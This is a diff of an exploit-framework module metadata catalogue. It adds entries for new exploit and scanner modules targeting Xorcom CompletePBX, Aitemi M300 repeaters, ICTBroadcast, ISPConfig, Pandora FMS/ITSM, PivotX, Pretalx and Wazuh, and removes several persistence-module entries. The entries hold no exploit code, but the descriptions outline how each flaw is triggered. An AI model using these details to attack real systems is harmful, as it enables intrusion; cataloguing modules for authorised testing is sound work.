+    "is_install_path": true,
+    "ref_name": "scanner/http/pretalx_file_read_cve_2023_28459",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_scanner/http/prev_dir_same_name_file": {
    "name": "HTTP Previous Directory File Scanner",
    "fullname": "auxiliary/scanner/http/prev_dir_same_name_file",
@@ -46418,7 +46957,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-12-29 17:25:12 +0000",
+    "mod_time": "2025-07-29 11:36:48 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_ultimate_member_sorting_sqli.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_ultimate_member_sorting_sqli",
@@ -46556,6 +47095,117 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_scanner/http/xorcom_completepbx_diagnostics_file_read": {
+    "name": "Xorcom CompletePBX Arbitrary File Read and Deletion via systemDataFileName",
+    "fullname": "auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-03-02",
+    "type": "auxiliary",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an authenticated path traversal vulnerability in\n          Xorcom CompletePBX <= 5.2.35. The issue occurs due to improper validation of the\n          `systemDataFileName` parameter in the `diagnostics` module, allowing authenticated attackers\n          to retrieve arbitrary files from the system.\n\n          Additionally, the exploitation of this vulnerability results in the **deletion** of the\n          requested file from the target system.\n\n          The vulnerability is identified as CVE-2025-30005.",
+    "references": [
+      "CVE-2025-30005",
+      "URL-https://xorcom.com/new-completepbx-release-5-2-36-1/",
+      "URL-https://chocapikk.com/posts/2025/completepbx/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-07-16 22:59:48 +0000",
+    "path": "/modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/xorcom_completepbx_diagnostics_file_read",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe",
+        "os-resource-loss"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
+  "auxiliary_scanner/http/xorcom_completepbx_file_disclosure": {
+    "name": "Xorcom CompletePBX Authenticated File Disclosure via Backup Download",
+    "fullname": "auxiliary/scanner/http/xorcom_completepbx_file_disclosure",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-03-02",
+    "type": "auxiliary",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an authenticated file disclosure vulnerability in CompletePBX <= 5.2.35.\n          The issue resides in the backup download function, where user input is not properly validated,\n          allowing an attacker to access arbitrary files on the system as root.\n\n          The vulnerability is triggered by setting the `backup` parameter to a Base64-encoded\n          absolute file path, prefixed by a comma `,`. This results in the server exposing the\n          file contents directly.",
+    "references": [
+      "CVE-2025-2292",
+      "URL-https://xorcom.com/new-completepbx-release-5-2-36-1/",
+      "URL-https://chocapikk.com/posts/2025/completepbx/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-07-16 22:59:48 +0000",
+    "path": "/modules/auxiliary/scanner/http/xorcom_completepbx_file_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/xorcom_completepbx_file_disclosure",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_scanner/http/xpath": {
    "name": "HTTP Blind XPATH 1.0 Injector",
    "fullname": "auxiliary/scanner/http/xpath",
@@ -47296,7 +47946,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-04-08 18:21:39 +0000",
+    "mod_time": "2025-02-12 17:47:18 +0000",
    "path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ldap/ldap_login",
@@ -51032,7 +51682,7 @@
      "postgres"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-02 16:31:33 +0000",
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
@@ -51876,7 +52526,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-07-24 19:23:44 +0000",
    "path": "/modules/auxiliary/scanner/redis/redis_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_server",
@@ -53084,7 +53734,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-28 22:15:05 +0000",
+    "mod_time": "2025-09-02 10:05:42 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_router_portscanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_router_portscanner",
@@ -55238,7 +55888,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-09-12 14:27:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -56361,14 +57011,16 @@
      "Nicholas Starke <nick@alephvoid.com>"
    ],
    "description": "This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.\n          The 'karaf' user has a known default password, which can be used to login to the\n          SSH service, and execute operating system commands from remote.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "Unix",
    "arch": "cmd",
    "rport": 8101,
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/apache_karaf_command_execution",
@@ -57141,7 +57793,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-02-28 09:35:28 +0000",
+    "mod_time": "2025-09-03 11:08:43 +0000",
    "path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/ssl_version",
@@ -67547,6 +68199,64 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/aitemi_m300_time_rce": {
+    "name": "Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)",
+    "fullname": "exploit/linux/http/aitemi_m300_time_rce",
+    "aliases": [],
+    "rank": 400,
+    "disclosure_date": "2025-08-07",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection vulnerability\n          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability\n          lies in the 'time' parameter of the time configuration endpoint, which is passed\n          unsanitized to a shell command executed via the `date -s` mechanism. The injection\n          executes with root privileges, without requiring authentication, reboot, or\n          network reconfiguration.",
+    "references": [
+      "URL-https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/",
+      "CVE-2025-34152"
+    ],
+    "platform": "Unix",
+    "arch": "cmd, mipsbe",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Meterpreter MIPSBE (MAY crash HTTP worker)"
+    ],
+    "mod_time": "2025-08-14 16:37:13 +0000",
+    "path": "/modules/exploits/linux/http/aitemi_m300_time_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/aitemi_m300_time_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/alcatel_omnipcx_mastercgi_exec": {
    "name": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",
    "fullname": "exploit/linux/http/alcatel_omnipcx_mastercgi_exec",
@@ -74960,6 +75670,63 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ictbroadcast_unauth_cookie": {
+    "name": "ICTBroadcast Unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/ictbroadcast_unauth_cookie",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-03-19",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution (RCE) vulnerability\n          in ICTBroadcast. The vulnerability exists in the way session cookies are handled\n          and processed, allowing an attacker to inject arbitrary system commands.",
+    "references": [
+      "URL-https://www.ictbroadcast.com/",
+      "CVE-2025-2611"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell"
+    ],
+    "mod_time": "2025-08-04 17:53:29 +0000",
+    "path": "/modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ictbroadcast_unauth_cookie",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/imperva_securesphere_exec": {
    "name": "Imperva SecureSphere PWS Command Injection",
    "fullname": "exploit/linux/http/imperva_securesphere_exec",
@@ -75433,6 +76200,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ispconfig_lang_edit_php_code_injection": {
+    "name": "ISPConfig language_edit.php PHP Code Injection",
+    "fullname": "exploit/linux/http/ispconfig_lang_edit_php_code_injection",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2023-10-24",
+    "type": "exploit",
+    "author": [
+      "syfi",
+      "Egidio Romano"
+    ],
+    "description": "This module exploits a PHP code injection vulnerability in ISPConfig's\n          language_edit.php file. The vulnerability occurs when the `admin_allow_langedit`\n          setting is enabled, allowing authenticated administrators to inject arbitrary\n          PHP code through the language editor interface.\n\n          This module will automatically check if the required `admin_allow_langedit`\n          permission is enabled, and attempt to enable it if it's disabled (requires\n          admin credentials with system configuration access).\n\n          The exploit works by injecting a PHP payload into a language file, which\n          is then executed when the file is accessed. The payload is base64 encoded\n          and written using PHP's file_put_contents function.",
+    "references": [
+      "CVE-2023-46818",
+      "URL-https://github.com/SyFi/CVE-2023-46818",
+      "URL-https://karmainsecurity.com/KIS-2023-13",
+      "URL-https://karmainsecurity.com/pocs/CVE-2023-46818.php"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic PHP"
+    ],
+    "mod_time": "2025-07-07 11:54:28 +0000",
+    "path": "/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ispconfig_lang_edit_php_code_injection",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/ivanti_connect_secure_rce_cve_2023_46805": {
    "name": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
    "fullname": "exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805",
@@ -80228,6 +81056,63 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/pandora_fms_auth_netflow_rce": {
+    "name": "PandoraFMS Netflow Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/pandora_fms_auth_netflow_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-27",
+    "type": "exploit",
+    "author": [
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to be present on the system.",
+    "references": [
+      "CVE-2025-5306"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux/Unix Command"
+    ],
+    "mod_time": "2025-07-31 12:58:28 +0000",
+    "path": "/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pandora_fms_auth_netflow_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_fms_auth_rce_cve_2024_11320": {
    "name": "Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password",
    "fullname": "exploit/linux/http/pandora_fms_auth_rce_cve_2024_11320",
@@ -80524,6 +81409,66 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/pandora_itsm_auth_rce_cve_2025_4653": {
+    "name": "Pandora ITSM authenticated command injection leading to RCE via the backup function",
+    "fullname": "exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-10",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support\n          and customer service teams, aligned with ITIL processes.\n          This module exploits a command injection vulnerability in the `name` backup setting at the\n          application setup page of Pandora ITSM. This can be triggered by generating a backup with a\n          malicious payload injected at the `name` parameter.\n          You need to have admin access at the Pandora ITSM  Web application in order to execute this RCE.\n          This access can be achieved by knowing the admin credentials to access the web application or\n          leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access\n          the Pandora FMS ITSM database, create a new admin user and gain administrative access to the\n          Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the\n          MySQL services are exposed to the outside world.\n          This issue affects all ITSM Enterprise editions up to `5.0.105` and is patched at `5.0.106`.",
+    "references": [
+      "CVE-2025-4653",
+      "URL-https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/",
+      "URL-https://github.com/h00die-gr3y/h00die-gr3y/security/advisories/GHSA-m4f8-9c8x-8f3f",
+      "URL-https://attackerkb.com/topics/wgCb1QQm1t/cve-2025-4653"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-08-06 08:22:06 +0000",
+    "path": "/modules/exploits/linux/http/pandora_itsm_auth_rce_cve_2025_4653.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pandora_itsm_auth_rce_cve_2025_4653",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_ping_cmd_exec": {
    "name": "Pandora FMS Ping Authenticated Remote Code Execution",
    "fullname": "exploit/linux/http/pandora_ping_cmd_exec",
@@ -81288,6 +82233,125 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/pivotx_index_php_overwrite": {
+    "name": "PivotX Remote Code Execution",
+    "fullname": "exploit/linux/http/pivotx_index_php_overwrite",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-07-10",
+    "type": "exploit",
+    "author": [
+      "HayToN",
+      "msutovsky-r7"
+    ],
+    "description": "This module gains remote code execution in PivotX management system. The PivotX allows admin user to directly edit files on the webserver, including PHP files. The module exploits this by writing a malicious payload into `index.php` file, gaining remote code execution.",
+    "references": [
+      "EDB-52361",
+      "URL-https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3",
+      "CVE-2025-52367"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux"
+    ],
+    "mod_time": "2025-08-12 10:42:46 +0000",
+    "path": "/modules/exploits/linux/http/pivotx_index_php_overwrite.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pivotx_index_php_overwrite",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_linux/http/pretalx_rce_cve_2023_28458": {
+    "name": "Pretalx Limited File Write to Remote Code Execution",
+    "fullname": "exploit/linux/http/pretalx_rce_cve_2023_28458",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2023-03-07",
+    "type": "exploit",
+    "author": [
+      "Stefan Schiller",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits CVE-2023-28458, a limited file write in Pretalx, up to version 2.3.1. The module will use the vulnerability to write a malicious site-specific configuration hook forPython. Once hook is written, payload will be executed every time Pretalx user runs any Python code. Pretalx needs to run in debug mode to exploit this.",
+    "references": [
+      "URL-https://www.sonarsource.com/blog/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference/",
+      "CVE-2023-28458"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Target"
+    ],
+    "mod_time": "2025-08-22 15:26:46 +0000",
+    "path": "/modules/exploits/linux/http/pretalx_rce_cve_2023_28458.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pretalx_rce_cve_2023_28458",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/progress_flowmon_unauth_cmd_injection": {
    "name": "Flowmon Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/progress_flowmon_unauth_cmd_injection",
@@ -84293,7 +85357,8 @@
      "CVE-2022-24989",
      "URL-https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/",
      "URL-https://github.com/0xf4n9x/CVE-2022-24990",
-      "URL-https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990"
+      "URL-https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "cmd, x64, x86, aarch64",
@@ -84317,7 +85382,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2023-06-12 19:28:08 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb",
    "is_install_path": true,
    "ref_name": "linux/http/terramaster_unauth_rce_cve_2022_24990",
@@ -86241,6 +87306,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/wazuh_auth_rce_cve_2025_24016": {
+    "name": "Wazuh server remote code execution caused by an unsafe deserialization vulnerability.",
+    "fullname": "exploit/linux/http/wazuh_auth_rce_cve_2025_24016",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-02-10",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "DanielFi https://github.com/DanielFi"
+    ],
+    "description": "Wazuh is a free and open source platform used for threat prevention, detection, and response.\n          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability\n          allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized\n          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).\n          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can\n          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.\n          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh\n          servers in the cluster) or, in certain configurations, even by a compromised agent.",
+    "references": [
+      "CVE-2025-24016",
+      "URL-https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh",
+      "URL-https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 55000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command"
+    ],
+    "mod_time": "2025-07-30 20:24:56 +0000",
+    "path": "/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wazuh_auth_rce_cve_2025_24016",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/wd_mycloud_multiupload_upload": {
    "name": "Western Digital MyCloud multi_uploadify File Upload Vulnerability",
    "fullname": "exploit/linux/http/wd_mycloud_multiupload_upload",
@@ -86839,6 +87964,64 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/xorcom_completepbx_scheduler": {
+    "name": "Xorcom CompletePBX Authenticated Command Injection via Task Scheduler",
+    "fullname": "exploit/linux/http/xorcom_completepbx_scheduler",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-03-02",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerability in Xorcom CompletePBX\n          versions <= 5.2.35. The issue resides in the task scheduler functionality, where user-controlled\n          input is improperly sanitized, allowing arbitrary command execution with web server privileges.\n\n          Only the superadmin user (admin) has the necessary permissions to trigger this exploit.\n          Even when creating a new user with maximum privileges, the vulnerability does not work.",
+    "references": [
+      "CVE-2025-30004",
+      "URL-https://xorcom.com/new-completepbx-release-5-2-36-1/",
+      "URL-https://chocapikk.com/posts/2025/completepbx/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell"
+    ],
+    "mod_time": "2025-07-16 22:59:48 +0000",
+    "path": "/modules/exploits/linux/http/xorcom_completepbx_scheduler.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/xorcom_completepbx_scheduler",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/xplico_exec": {
    "name": "Xplico Remote Code Execution",
    "fullname": "exploit/linux/http/xplico_exec",
@@ -87991,51 +89174,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/apt_package_manager_persistence": {
-    "name": "APT Package Manager Persistence",
-    "fullname": "exploit/linux/local/apt_package_manager_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1999-03-09",
-    "type": "exploit",
-    "author": [
-      "Aaron Ringo"
-    ],
-    "description": "This module will run a payload when the package manager is used. No\n          handler is ran automatically so you must configure an appropriate\n          exploit/multi/handler to connect. This module creates a pre-invoke hook\n          for APT in apt.conf.d. The hook name syntax is numeric followed by text.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/apt_package_manager_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/asan_suid_executable_priv_esc": {
    "name": "AddressSanitizer (ASan) SUID Executable Privilege Escalation",
    "fullname": "exploit/linux/local/asan_suid_executable_priv_esc",
@@ -88091,99 +89229,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/autostart_persistence": {
-    "name": "Autostart Desktop Item Persistence",
-    "fullname": "exploit/linux/local/autostart_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2006-02-13",
-    "type": "exploit",
-    "author": [
-      "Eliott Teissonniere"
-    ],
-    "description": "This module will create an autostart entry to execute a payload.\n          The payload will be executed when the users logs in.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/autostart_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/autostart_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
-  "exploit_linux/local/bash_profile_persistence": {
-    "name": "Bash Profile Persistence",
-    "fullname": "exploit/linux/local/bash_profile_persistence",
-    "aliases": [],
-    "rank": 300,
-    "disclosure_date": "1989-06-08",
-    "type": "exploit",
-    "author": [
-      "Michael Long <bluesentinel@protonmail.com>"
-    ],
-    "description": "This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal. A handler is not run automatically, so you\n          must configure an appropriate exploit/multi/handler to receive the callback.",
-    "references": [
-      "URL-https://attack.mitre.org/techniques/T1156/"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2021-12-24 03:06:37 +0000",
